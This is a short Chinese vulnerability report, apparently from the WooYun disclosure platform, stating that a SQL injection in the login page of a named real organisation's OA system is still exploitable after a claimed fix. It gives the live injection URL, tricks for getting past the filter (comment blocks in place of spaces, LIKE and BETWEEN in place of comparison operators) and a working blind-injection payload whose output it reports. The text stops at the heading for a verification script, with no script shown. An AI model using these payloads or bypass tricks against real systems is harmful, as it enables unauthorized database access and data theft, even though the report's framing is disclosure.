http://wooyun.org/bugs/wooyun-2015-0148934
提示已经修复
经测试
过滤了空格和等号
所以仍然可以注入
注入点http://oa.tianya.cn/login/LoginOperation.jsp?method=checkTokenKey&loginid=1999001
提示Tips:System error.
返回正常
可以使用like来替换and
空格可以使用/**/
大于号、小于号、等号可以用between and 来替换
其他测试用的payload
http://oa.tianya.cn/login/LoginOperation.jsp?method=checkTokenKey&loginid=1999001'/**/and/**/len/**/((select/**/user))/**/between/**/7/**/and/**/7/**/and/**/'a'/**/like/**/'a
当前用户长度为7
验证脚本